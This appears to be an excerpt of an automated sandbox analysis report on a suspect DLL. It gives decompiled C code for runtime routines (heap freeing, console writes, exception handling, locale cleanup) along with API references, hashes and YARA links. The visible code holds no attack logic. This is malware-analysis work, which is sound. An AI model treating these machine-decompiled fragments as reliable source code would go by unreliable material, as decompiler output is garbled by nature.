																					 *0x6de95108 =  *((intOrPtr*)(_t295 + 0x88));
																					 *0x6de951c0 =  *_t295;
																					_t296 =  *((intOrPtr*)(_t295 + 4));
																					 *0x6de951ec = _t296;
																					return _t296;
																				} else {
																					__eflags = _v280 - 0x43;
																					 *((intOrPtr*)(_t455 + _t435)) = _v720;
																					if(_v280 != 0x43) {
																						L104:
																						_t299 = E6DE1DB3B(_t367, _t394, _t435,  &_v708);
																						_t398 = _v712;
																						 *(_t435 + 0xa0 + _t367 * 4) = _t299;
																					} else {
																						__eflags = _v278;
																						if(_v278 != 0) {
																							goto L104;
																						} else {
																							_t398 = _v712;
																							 *(_t435 + 0xa0 + _t367 * 4) = _t398;
																						}
																					}
																					__eflags = _t367 - 2;
																					if(_t367 != 2) {
																						__eflags = _t367 - 1;
																						if(_t367 != 1) {
																							__eflags = _t367 - 5;
																							if(_t367 == 5) {
																								 *((intOrPtr*)(_t435 + 0x14)) = _v716;
																							}
																						} else {
																							 *((intOrPtr*)(_t435 + 0x10)) = _v716;
																						}
																					} else {
																						_t460 = _v736;
																						_t428 = _t398;
																						_t408 = _t460;
																						 *(_t435 + 8) = _v716;
																						_v720 = _t460;
																						_v728 = _t460[8];
																						_v716 = _t460[9];
																						while(1) {
																							_t154 = _t435 + 8; // 0x8b018b
																							__eflags =  *_t154 -  *_t408;
																							if( *_t154 ==  *_t408) {
																								break;
																							}
																							_t461 = _v720;
																							_t428 = _t428 + 1;
																							_t331 =  *_t408;
																							 *_t461 = _v728;
																							_v716 = _t408[1];
																							_t408 = _t461 + 8;
																							 *((intOrPtr*)(_t461 + 4)) = _v716;
																							_t367 = _v752;
																							_t460 = _v736;
																							_v728 = _t331;
																							_v720 = _t408;
																							__eflags = _t428 - 5;
																							if(_t428 < 5) {
																								continue;
																							} else {
																							}
																							L112:
																							__eflags = _t428 - 5;
																							if(__eflags == 0) {
																								_t178 = _t435 + 8; // 0x8b018b
																								_t322 = E6DE26102(_t367, _t428, _t435, __eflags, _v712, 1, 0x6de40ea8, 0x7f,  &_v536,  *_t178, 1);
																								_t482 = _t482 + 0x1c;
																								__eflags = _t322;
																								_t323 = _v712;
																								if(_t322 == 0) {
																									_t460[1] = _t323;
																								} else {
																									do {
																										 *(_t468 + _t323 * 2 - 0x20c) =  *(_t468 + _t323 * 2 - 0x20c) & 0x000001ff;
																										_t323 = _t323 + 1;
																										__eflags = _t323 - 0x7f;
																									} while (_t323 < 0x7f);
																									_t326 = E6DDF1C3C( &_v536,  *0x6de951e8, 0xfe);
																									_t482 = _t482 + 0xc;
																									__eflags = _t326;
																									_t460[1] = 0 | _t326 == 0x00000000;
																								}
																								_t193 = _t435 + 8; // 0x8b018b
																								 *_t460 =  *_t193;
																							}
																							 *(_t435 + 0x18) = _t460[1];
																							goto L123;
																						}
																						__eflags = _t428;
																						if(_t428 != 0) {
																							 *_t460 =  *(_t460 + _t428 * 8);
																							_t460[1] =  *(_t460 + 4 + _t428 * 8);
																							 *(_t460 + _t428 * 8) = _v728;
																							 *(_t460 + 4 + _t428 * 8) = _v716;
																						}
																						goto L112;
																					}
																					L123:
																					_t300 = _t367 * 0xc;
																					_t200 = _t300 + 0x6de40de8; // 0x6ddd815c
																					 *0x6de3a26c(_t435);
																					_t302 =  *((intOrPtr*)( *_t200))();
																					_t401 = _v732;
																					__eflags = _t302;
																					if(_t302 == 0) {
																						__eflags = _t401 - 0x6de952b0;
																						if(_t401 != 0x6de952b0) {
																							_t459 = _t367 + _t367;
																							__eflags = _t459;
																							asm("lock xadd [eax], ecx");
																							if(_t459 != 0) {
																								goto L128;
																							} else {
																								_t218 = _t459 * 8; // 0x10468b00
																								E6DE1CBD3( *((intOrPtr*)(_t435 + _t218 + 0x28)));
																								_t221 = _t459 * 8; // 0x3b8e8
																								E6DE1CBD3( *((intOrPtr*)(_t435 + _t221 + 0x24)));
																								_t224 = _t367 * 4; // 0xe764e850
																								E6DE1CBD3( *((intOrPtr*)(_t435 + _t224 + 0xa0)));
																								_t404 = _v712;
																								 *((intOrPtr*)(_v724 + _t435)) = _t404;
																								 *(_t435 + 0xa0 + _t367 * 4) = _t404;
																							}
																						}
																						_t402 = _v740;
																						 *_t402 = 1;
																						 *((intOrPtr*)(_t435 + 0x28 + (_t367 + _t367) * 8)) = _t402;
																					} else {
																						 *(_v724 + _t435) = _t401;
																						_t205 = _t367 * 4; // 0xe764e850
																						E6DE1CBD3( *((intOrPtr*)(_t435 + _t205 + 0xa0)));
																						 *(_t435 + 0xa0 + _t367 * 4) = _v744;
																						E6DE1CBD3(_v740);
																						 *(_t435 + 8) = _v748;
																						goto L86;
																					}
																					goto L87;
																				}
																			}
																		} else {
																			goto L87;
																		}
																		goto L131;
																	}
																	asm("sbb eax, eax");
																	_t284 = _t283 | 0x00000001;
																	__eflags = _t284;
																	goto L95;
																} else {
																	L86:
																	__eflags = 0;
																	L87:
																	_pop(_t456);
																	__eflags = _v16 ^ _t468;
																	return E6DDEF8A5(_v16 ^ _t468, _t428, _t456);
																}
															} else {
																_t333 = _t450 + _t450;
																__eflags = _t333 - 0x106;
																if(_t333 >= 0x106) {
																	E6DDF03A9();
																	goto L83;
																} else {
																	 *((short*)(_t466 + _t333 - 0x10c)) = 0;
																	_t335 =  &_v276;
																	_push(_t335);
																	_push(_v460);
																	_push(_t431);
																	L84();
																	_t475 = _t478 + 0xc;
																	__eflags = _t335;
																	_t270 = _v452;
																	if(_t335 != 0) {
																		_t270 = _t270 + 1;
																		_v452 = _t270;
																	}
																	L55:
																	_t447 = _t362 + _t450 * 2;
																	_t373 = 0;
																	__eflags =  *_t447;
																	if( *_t447 == 0) {
																		L57:
																		__eflags = _t270;
																		L78:
																		if(__eflags != 0) {
																			goto L80;
																		} else {
																		}
																		goto L81;
																	} else {
																		_t447 = _t447 + 2;
																		__eflags =  *_t447;
																		if( *_t447 != 0) {
																			continue;
																		} else {
																			goto L57;
																		}
																	}
																}
															}
														}
													} else {
														_t336 = 0x3b;
														__eflags =  *_t362 - _t336;
														if( *_t362 != _t336) {
															break;
														} else {
															goto L49;
														}
													}
												}
											}
											goto L131;
										}
										goto L81;
									}
								}
							}
						}
					} else {
						__eflags = _t447;
						if(_t447 != 0) {
							_push(_t447);
							_push(_t251);
							_push(_t431);
							L84();
						}
						L81:
						_pop(_t448);
						__eflags = _v12 ^ _t466;
						return E6DDEF8A5(_v12 ^ _t466, _t425, _t448);
					}
				}
				L131:
			}

APIs

Part of subcall function 6DE1F26D: HeapAlloc.KERNEL32(00000000,6DDD75D9,00000000,?,6DDF0F8B,00000002,00000000,?,?,?,6DDB1298,6DDD75D9,00000004,00000000,00000000,00000000), ref: 6DE1F29F

_free.LIBCMT ref: 6DE1E611
_free.LIBCMT ref: 6DE1E628
_free.LIBCMT ref: 6DE1E647
_free.LIBCMT ref: 6DE1E662
_free.LIBCMT ref: 6DE1E679

Strings

m, xrefs: 6DE1E559

Memory Dump Source

Source File: 0000000F.00000002.526779862.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 0000000F.00000002.525210035.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.561475064.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.580235339.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.582478013.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.583528665.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$AllocHeap
String ID: m
API String ID: 1835388192-2505914020
Opcode ID: 5c5b3947204d2e9b0b2fd68d92c1081c416c3840b345fd7745a75a30a3981121
Instruction ID: b79cdef547269ac832e5e24574395db7bc3b2c6bf7697f4f3941a7376206d0fc
Opcode Fuzzy Hash: 5c5b3947204d2e9b0b2fd68d92c1081c416c3840b345fd7745a75a30a3981121
Instruction Fuzzy Hash: 8D51C171B08A05AFD711CF29CC40A6AB3F5EF49B28F60456DF909E7650EB31E9418B80

Uniqueness

Uniqueness Score: -1.00%

Function 6DE22C2B, Relevance: 10.7, APIs: 7, Instructions: 152
fileCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E6DE22C2B(void* __ebx, void* __edi, intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				signed char _v15;
				char _v16;
				void _v24;
				short _v28;
				char _v31;
				void _v32;
				long _v36;
				intOrPtr _v40;
				void* _v44;
				signed int _v48;
				signed char* _v52;
				long _v56;
				int _v60;
				void* __esi;
				signed int _t78;
				signed int _t80;
				int _t86;
				void* _t92;
				void* _t94;
				long _t97;
				void _t105;
				void* _t112;
				signed int _t116;
				signed int _t118;
				signed char _t123;
				signed char _t128;
				signed int _t129;
				signed char* _t131;
				intOrPtr* _t132;
				signed int _t133;
				void* _t134;

				_t78 =  *0x6de9506c; // 0x657f4f7b
				_v8 = _t78 ^ _t133;
				_t80 = _a8;
				_t118 = _t80 >> 6;
				_t116 = (_t80 & 0x0000003f) * 0x30;
				_t131 = _a12;
				_v52 = _t131;
				_v48 = _t118;
				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x6de976f8 + _t118 * 4)) + _t116 + 0x18));
				_v40 = _a16 + _t131;
				_t86 = GetConsoleCP();
				_t132 = _a4;
				_v60 = _t86;
				 *_t132 = 0;
				 *((intOrPtr*)(_t132 + 4)) = 0;
				 *((intOrPtr*)(_t132 + 8)) = 0;
				while(_t131 < _v40) {
					_v28 = 0;
					_v31 =  *_t131;
					_t129 =  *(0x6de976f8 + _v48 * 4);
					_t123 =  *(_t129 + _t116 + 0x2d);
					if((_t123 & 0x00000004) == 0) {
						_t92 = E6DE1367B(_t116, _t129);
						_t129 = 0x8000;
						if(( *(_t92 + ( *_t131 & 0x000000ff) * 2) & 0x00008000) == 0) {
							_push(1);
							_push(_t131);
							goto L8;
						} else {
							if(_t131 >= _v40) {
								_t129 = _v48;
								 *((char*)( *((intOrPtr*)(0x6de976f8 + _t129 * 4)) + _t116 + 0x2e)) =  *_t131;
								 *( *((intOrPtr*)(0x6de976f8 + _t129 * 4)) + _t116 + 0x2d) =  *( *((intOrPtr*)(0x6de976f8 + _t129 * 4)) + _t116 + 0x2d) | 0x00000004;
								 *((intOrPtr*)(_t132 + 4)) =  *((intOrPtr*)(_t132 + 4)) + 1;
							} else {
								_t112 = E6DE1CF1B( &_v28, _t131, 2);
								_t134 = _t134 + 0xc;
								if(_t112 != 0xffffffff) {
									_t131 =  &(_t131[1]);
									goto L9;
								}
							}
						}
					} else {
						_t128 = _t123 & 0x000000fb;
						_v16 =  *((intOrPtr*)(_t129 + _t116 + 0x2e));
						_push(2);
						_v15 = _t128;
						 *(_t129 + _t116 + 0x2d) = _t128;
						_push( &_v16);
						L8:
						_push( &_v28);
						_t94 = E6DE1CF1B();
						_t134 = _t134 + 0xc;
						if(_t94 != 0xffffffff) {
							L9:
							_t131 =  &(_t131[1]);
							_t97 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
							_v56 = _t97;
							if(_t97 != 0) {
								if(WriteFile(_v44,  &_v24, _t97,  &_v36, 0) == 0) {
									L19:
									 *_t132 = GetLastError();
								} else {
									 *((intOrPtr*)(_t132 + 4)) =  *((intOrPtr*)(_t132 + 8)) - _v52 + _t131;
									if(_v36 >= _v56) {
										if(_v31 != 0xa) {
											goto L16;
										} else {
											_t105 = 0xd;
											_v32 = _t105;
											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
												goto L19;
											} else {
												if(_v36 >= 1) {
													 *((intOrPtr*)(_t132 + 8)) =  *((intOrPtr*)(_t132 + 8)) + 1;
													 *((intOrPtr*)(_t132 + 4)) =  *((intOrPtr*)(_t132 + 4)) + 1;
													goto L16;
												}
											}
										}
									}
								}
							}
						}
					}
					goto L20;
					L16:
				}
				L20:
				return E6DDEF8A5(_v8 ^ _t133, _t129, _t132);
			}

APIs

GetConsoleCP.KERNEL32(00000000,?,?,?,?,?,?,?,?,6DE233A0,?,?,00000000,?,?,?), ref: 6DE22C6D
__fassign.LIBCMT ref: 6DE22CE8
__fassign.LIBCMT ref: 6DE22D03
WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00000000,00000005,00000000,00000000), ref: 6DE22D29
WriteFile.KERNEL32(?,00000000,00000000,6DE233A0,00000000,?,?,?,?,?,?,?,?,?,6DE233A0,?), ref: 6DE22D48
WriteFile.KERNEL32(?,?,00000001,6DE233A0,00000000,?,?,?,?,?,?,?,?,?,6DE233A0,?), ref: 6DE22D81

Memory Dump Source

Source File: 0000000F.00000002.526779862.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 0000000F.00000002.525210035.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.561475064.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.580235339.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.582478013.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.583528665.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 3a10d5dc533f734151e5220854672d1dcc64ed0130d323453bddd69c40fbe67b
Instruction ID: 104513e5977ea89ddfb3f21c2a0ca18cf07bb6de8ea858be2271a30c6aaaa3a2
Opcode Fuzzy Hash: 3a10d5dc533f734151e5220854672d1dcc64ed0130d323453bddd69c40fbe67b
Instruction Fuzzy Hash: C95182B1E112499FDB20CFA8C885BEEBBF8EF19300F25455AE955E7281DB30D941CB61

Uniqueness

Uniqueness Score: -1.00%

Function 6DDF3F60, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 121
COMMON

Download Yara Rule

C-Code - Quality: 52%

			E6DDF3F60(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __eflags, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				long _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				long _v40;
				signed int _t48;
				char _t51;
				signed int _t58;
				intOrPtr _t59;
				void* _t60;
				intOrPtr* _t61;
				intOrPtr _t63;
				void* _t66;
				long _t68;
				long _t70;
				intOrPtr _t74;
				signed int _t78;
				char _t80;
				intOrPtr _t83;
				intOrPtr _t88;
				intOrPtr _t90;
				intOrPtr _t93;
				long _t95;
				long _t97;
				void* _t98;
				void* _t100;
				void* _t102;
				void* _t104;
				void* _t105;
				void* _t112;

				_t86 = __edx;
				_push(__ebx);
				_t74 = _a8;
				_push(__edi);
				_v5 = 0;
				_t93 = _t74 + 0x10;
				_t48 =  *(_t74 + 8) ^  *0x6de9506c;
				_push(_t93);
				_push(_t48);
				_v16 = 1;
				_v20 = _t93;
				_v12 = _t48;
				E6DDF3F20(_t74, __edx);
				E6DDF5267(_a12);
				_t51 = _a4;
				_t105 = _t104 + 0xc;
				_t90 =  *((intOrPtr*)(_t74 + 0xc));
				if(( *(_t51 + 4) & 0x00000066) != 0) {
					__eflags = _t90 - 0xfffffffe;
					if(_t90 != 0xfffffffe) {
						_t86 = 0xfffffffe;
						E6DDF5920(_t74, 0xfffffffe, _t93, 0x6de9506c);
						goto L14;
					}
					goto L15;
				} else {
					_v32 = _t51;
					_v28 = _a12;
					 *((intOrPtr*)(_t74 - 4)) =  &_v32;
					if(_t90 == 0xfffffffe) {
						L15:
						return _v16;
					} else {
						do {
							_t78 = _v12;
							_t20 = _t90 + 2; // 0x3
							_t58 = _t90 + _t20 * 2;
							_t74 =  *((intOrPtr*)(_t78 + _t58 * 4));
							_t59 = _t78 + _t58 * 4;
							_t79 =  *((intOrPtr*)(_t59 + 4));
							_v24 = _t59;
							if( *((intOrPtr*)(_t59 + 4)) == 0) {
								_t80 = _v5;
								goto L8;
							} else {
								_t86 = _t93;
								_t60 = E6DDF58D0(_t79, _t93);
								_t80 = 1;
								_v5 = 1;
								_t112 = _t60;
								if(_t112 < 0) {
									_v16 = 0;
									L14:
									_push(_t93);
									_push(_v12);
									E6DDF3F20(_t74, _t86);
									goto L15;
								} else {
									if(_t112 > 0) {
										_t61 = _a4;
										__eflags =  *_t61 - 0xe06d7363;
										if( *_t61 == 0xe06d7363) {
											__eflags =  *0x6de3e698;
											if(__eflags != 0) {
												_t70 = E6DE37400(__eflags, 0x6de3e698);
												_t105 = _t105 + 4;
												__eflags = _t70;
												if(_t70 != 0) {
													_t97 =  *0x6de3e698; // 0x6ddf3b1a
													 *0x6de3a26c(_a4, 1);
													 *_t97();
													_t93 = _v20;
													_t105 = _t105 + 8;
												}
												_t61 = _a4;
											}
										}
										_t87 = _t61;
										E6DDF5904(_t61, _a8, _t61);
										_t63 = _a8;
										__eflags =  *((intOrPtr*)(_t63 + 0xc)) - _t90;
										if( *((intOrPtr*)(_t63 + 0xc)) != _t90) {
											_t87 = _t90;
											E6DDF5920(_t63, _t90, _t93, 0x6de9506c);
											_t63 = _a8;
										}
										_push(_t93);
										_push(_v16);
										 *((intOrPtr*)(_t63 + 0xc)) = _t74;
										E6DDF3F20(_t74, _t87);
										_t88 = _t93;
										_t83 =  *((intOrPtr*)(_v28 + 8));
										E6DDF58E8();
										asm("int3");
										_t100 = _t98;
										_t102 = _t100;
										_push(_t102);
										_push(_t93);
										_t95 = _v40;
										__eflags = _t95 - 0xffffffe0;
										if(_t95 > 0xffffffe0) {
											L32:
											 *((intOrPtr*)(E6DE12281())) = 0xc;
											_t66 = 0;
											__eflags = 0;
										} else {
											__eflags = _t95;
											if(_t95 == 0) {
												_t95 = _t95 + 1;
											}
											while(1) {
												_t66 = HeapAlloc( *0x6de97b04, 0, _t95);
												__eflags = _t66;
												if(_t66 != 0) {
													break;
												}
												__eflags = E6DE2BEB2();
												if(__eflags == 0) {
													goto L32;
												} else {
													_t68 = E6DE19256(_t74, _t83, _t88, _t90, __eflags, _t95);
													_pop(_t83);
													__eflags = _t68;
													if(_t68 == 0) {
														goto L32;
													} else {
														continue;
													}
												}
												goto L33;
											}
										}
										L33:
										return _t66;
									} else {
										goto L8;
									}
								}
							}
							goto L34;
							L8:
							_t90 = _t74;
						} while (_t74 != 0xfffffffe);
						if(_t80 != 0) {
							goto L14;
						}
						goto L15;
					}
				}
				L34:
			}

APIs

_ValidateLocalCookies.LIBCMT ref: 6DDF3F8B
___except_validate_context_record.LIBVCRUNTIME ref: 6DDF3F93
_ValidateLocalCookies.LIBCMT ref: 6DDF4021
__IsNonwritableInCurrentImage.LIBCMT ref: 6DDF404C
_ValidateLocalCookies.LIBCMT ref: 6DDF40A1

Strings

csm, xrefs: 6DDF4036

Memory Dump Source

Source File: 0000000F.00000002.526779862.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 0000000F.00000002.525210035.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.561475064.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.580235339.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.582478013.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.583528665.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 9c86270efe3cc47c3a1d61a9ab946b776f8102da95491efc94747f91a47e6e70
Instruction ID: b382dfe08ff69303ac4c97dacf90e362956c7bc857fa00feeffaec08ff1ced44
Opcode Fuzzy Hash: 9c86270efe3cc47c3a1d61a9ab946b776f8102da95491efc94747f91a47e6e70
Instruction Fuzzy Hash: 7E41B234A04209EBCF00EF68C840AAE7BB5EF45328F16C155F9149B356D732DA16CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6DE2D29B, Relevance: 10.6, APIs: 7, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6DE2D29B(intOrPtr _a4) {
				void* _t18;
				intOrPtr _t45;

				_t45 = _a4;
				if(_t45 != 0) {
					E6DE2CF81(_t45, 7);
					_t2 = _t45 + 0x1c; // 0x1c
					E6DE2CF81(_t2, 7);
					_t3 = _t45 + 0x38; // 0x38
					E6DE2CF81(_t3, 0xc);
					_t4 = _t45 + 0x68; // 0x68
					E6DE2CF81(_t4, 0xc);
					_t5 = _t45 + 0x98; // 0x98
					E6DE2CF81(_t5, 2);
					E6DE1CBD3( *((intOrPtr*)(_t45 + 0xa0)));
					E6DE1CBD3( *((intOrPtr*)(_t45 + 0xa4)));
					E6DE1CBD3( *((intOrPtr*)(_t45 + 0xa8)));
					_t9 = _t45 + 0xb4; // 0xb4
					E6DE2CF81(_t9, 7);
					_t10 = _t45 + 0xd0; // 0xd0
					E6DE2CF81(_t10, 7);
					_t11 = _t45 + 0xec; // 0xec
					E6DE2CF81(_t11, 0xc);
					_t12 = _t45 + 0x11c; // 0x11c
					E6DE2CF81(_t12, 0xc);
					_t13 = _t45 + 0x14c; // 0x14c
					E6DE2CF81(_t13, 2);
					E6DE1CBD3( *((intOrPtr*)(_t45 + 0x154)));
					E6DE1CBD3( *((intOrPtr*)(_t45 + 0x158)));
					E6DE1CBD3( *((intOrPtr*)(_t45 + 0x15c)));
					return E6DE1CBD3( *((intOrPtr*)(_t45 + 0x160)));
				}
				return _t18;
			}

APIs

Part of subcall function 6DE2CF81: _free.LIBCMT ref: 6DE2CFAA

_free.LIBCMT ref: 6DE2D2E9

Part of subcall function 6DE1CBD3: HeapFree.KERNEL32(00000000,00000000,?,6DE2CFAF,00000000,00000000,00000000,00000000,?,6DE2D2B4,00000000,00000007,00000000,?,6DE2C0FC,00000000), ref: 6DE1CBE9
Part of subcall function 6DE1CBD3: GetLastError.KERNEL32(00000000,?,6DE2CFAF,00000000,00000000,00000000,00000000,?,6DE2D2B4,00000000,00000007,00000000,?,6DE2C0FC,00000000,00000000), ref: 6DE1CBFB

_free.LIBCMT ref: 6DE2D2F4
_free.LIBCMT ref: 6DE2D2FF
_free.LIBCMT ref: 6DE2D353
_free.LIBCMT ref: 6DE2D35E
_free.LIBCMT ref: 6DE2D369
_free.LIBCMT ref: 6DE2D374

Memory Dump Source

Source File: 0000000F.00000002.526779862.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 0000000F.00000002.525210035.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.561475064.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.580235339.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.582478013.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.583528665.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 60696fea0fb7a8f1018e7d39f05bb92555332742b445cba9cf2dcfb68d68d62d
Instruction ID: 951ca8434bad5311aa123dca6ae97f31c248099c24918fce376f70bb1222d510
Opcode Fuzzy Hash: 60696fea0fb7a8f1018e7d39f05bb92555332742b445cba9cf2dcfb68d68d62d
Instruction Fuzzy Hash: A8118171B49B08AAE620A7B0CC85FDBB7ED9F0070CF518E2DA399E6051DF35F5144650

Uniqueness

Uniqueness Score: -1.00%

Function 6DDDEF91, Relevance: 10.6, APIs: 7, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E6DDDEF91(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t307;
				signed int _t308;
				void* _t320;
				void* _t333;
				void* _t346;
				void* _t359;
				void* _t372;
				void* _t385;
				void* _t398;
				void* _t411;
				void* _t424;
				void* _t437;
				void* _t450;
				void* _t463;
				void* _t476;
				void* _t489;
				void* _t502;
				void* _t515;
				void* _t528;
				void* _t541;
				void* _t554;
				void* _t567;
				signed int _t815;
				signed int _t882;
				signed int _t883;
				signed int _t884;
				signed int _t885;
				signed int _t886;
				signed int _t887;
				signed int _t888;
				signed int _t889;
				signed int _t890;
				signed int _t891;
				signed int _t892;
				signed int _t893;
				signed int _t894;
				signed int _t895;
				signed int _t896;
				signed int _t897;
				signed int _t898;
				signed int _t899;
				signed int _t900;
				signed int _t901;
				signed int _t903;
				signed int _t904;
				signed int _t905;
				signed int _t906;
				signed int _t907;
				signed int _t908;
				signed int _t909;
				signed int _t910;
				signed int _t911;
				signed int _t912;
				signed int _t913;
				signed int _t914;
				signed int _t915;
				signed int _t916;
				signed int _t917;
				signed int _t918;
				signed int _t919;
				signed int _t920;
				signed int _t921;
				signed int _t922;
				signed int _t923;
				signed int _t924;
				void* _t946;

				_t879 = __edx;
				_t668 = __ebx;
				E6DDF00AC(0x6de383cf, __ebx, __edi, __esi, 0x14);
				E6DDD6653(_t946 - 0x14, 0);
				_t903 =  *0x6de96de4; // 0x0
				 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
				 *(_t946 - 0x10) = _t903;
				_t307 = E6DDB161C(0x6de96d90);
				_t671 =  *((intOrPtr*)(_t946 + 8));
				_t308 = E6DDB171B( *((intOrPtr*)(_t946 + 8)), _t307);
				_t881 = _t308;
				if(_t308 != 0) {
					L5:
					E6DDD66BA(_t946 - 0x14);
					return E6DDF0075(_t881);
				} else {
					if(_t903 == 0) {
						_push( *((intOrPtr*)(_t946 + 8)));
						_push(_t946 - 0x10);
						__eflags = E6DDE0D03(__ebx, _t671, __edx, _t881, _t903) - 0xffffffff;
						if(__eflags == 0) {
							E6DDB1438(_t946 - 0x20);
							E6DDF3D74(_t946 - 0x20, 0x6de93504);
							asm("int3");
							E6DDF00AC(0x6de383cf, __ebx, _t881, _t903, 0x14);
							E6DDD6653(_t946 - 0x14, 0);
							_t904 =  *0x6de96db4; // 0x0
							 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
							 *(_t946 - 0x10) = _t904;
							_t320 = E6DDB161C(0x6de96d68);
							_t678 =  *((intOrPtr*)(_t946 + 8));
							_t882 = E6DDB171B( *((intOrPtr*)(_t946 + 8)), _t320);
							__eflags = _t882;
							if(_t882 != 0) {
								L12:
								E6DDD66BA(_t946 - 0x14);
								return E6DDF0075(_t882);
							} else {
								__eflags = _t904;
								if(_t904 == 0) {
									_push( *((intOrPtr*)(_t946 + 8)));
									_push(_t946 - 0x10);
									__eflags = E6DDE0DA5(_t668, _t678, __edx, _t882, _t904) - 0xffffffff;
									if(__eflags == 0) {
										E6DDB1438(_t946 - 0x20);
										E6DDF3D74(_t946 - 0x20, 0x6de93504);
										asm("int3");
										E6DDF00AC(0x6de383cf, _t668, _t882, _t904, 0x14);
										E6DDD6653(_t946 - 0x14, 0);
										_t905 =  *0x6de96dd4; // 0x0
										 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
										 *(_t946 - 0x10) = _t905;
										_t333 = E6DDB161C(0x6de96b28);
										_t685 =  *((intOrPtr*)(_t946 + 8));
										_t883 = E6DDB171B( *((intOrPtr*)(_t946 + 8)), _t333);
										__eflags = _t883;
										if(_t883 != 0) {
											L19:
											E6DDD66BA(_t946 - 0x14);
											return E6DDF0075(_t883);
										} else {
											__eflags = _t905;
											if(_t905 == 0) {
												_push( *((intOrPtr*)(_t946 + 8)));
												_push(_t946 - 0x10);
												__eflags = E6DDE0E47(_t668, _t685, __edx, _t883, _t905) - 0xffffffff;
												if(__eflags == 0) {
													E6DDB1438(_t946 - 0x20);
													E6DDF3D74(_t946 - 0x20, 0x6de93504);
													asm("int3");
													E6DDF00AC(0x6de383cf, _t668, _t883, _t905, 0x14);
													E6DDD6653(_t946 - 0x14, 0);
													_t906 =  *0x6de96de8; // 0x0
													 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
													 *(_t946 - 0x10) = _t906;
													_t346 = E6DDB161C(0x6de96d94);
													_t692 =  *((intOrPtr*)(_t946 + 8));
													_t884 = E6DDB171B( *((intOrPtr*)(_t946 + 8)), _t346);
													__eflags = _t884;
													if(_t884 != 0) {
														L26:
														E6DDD66BA(_t946 - 0x14);
														return E6DDF0075(_t884);
													} else {
														__eflags = _t906;
														if(_t906 == 0) {
															_push( *((intOrPtr*)(_t946 + 8)));
															_push(_t946 - 0x10);
															__eflags = E6DDE0EB7(_t668, _t692, _t879, _t884, _t906) - 0xffffffff;
															if(__eflags == 0) {
																E6DDB1438(_t946 - 0x20);
																E6DDF3D74(_t946 - 0x20, 0x6de93504);
																asm("int3");
																E6DDF00AC(0x6de383cf, _t668, _t884, _t906, 0x14);
																E6DDD6653(_t946 - 0x14, 0);
																_t907 =  *0x6de96db8; // 0x0
																 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																 *(_t946 - 0x10) = _t907;
																_t359 = E6DDB161C(0x6de96d6c);
																_t699 =  *((intOrPtr*)(_t946 + 8));
																_t885 = E6DDB171B( *((intOrPtr*)(_t946 + 8)), _t359);
																__eflags = _t885;
																if(_t885 != 0) {
																	L33:
																	E6DDD66BA(_t946 - 0x14);
																	return E6DDF0075(_t885);
																} else {
																	__eflags = _t907;
																	if(_t907 == 0) {
																		_push( *((intOrPtr*)(_t946 + 8)));
																		_push(_t946 - 0x10);
																		__eflags = E6DDE0F1F(_t668, _t699, _t879, _t885, _t907) - 0xffffffff;
																		if(__eflags == 0) {
																			E6DDB1438(_t946 - 0x20);
																			E6DDF3D74(_t946 - 0x20, 0x6de93504);
																			asm("int3");
																			E6DDF00AC(0x6de383cf, _t668, _t885, _t907, 0x14);
																			E6DDD6653(_t946 - 0x14, 0);
																			_t908 =  *0x6de96dec; // 0x0
																			 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
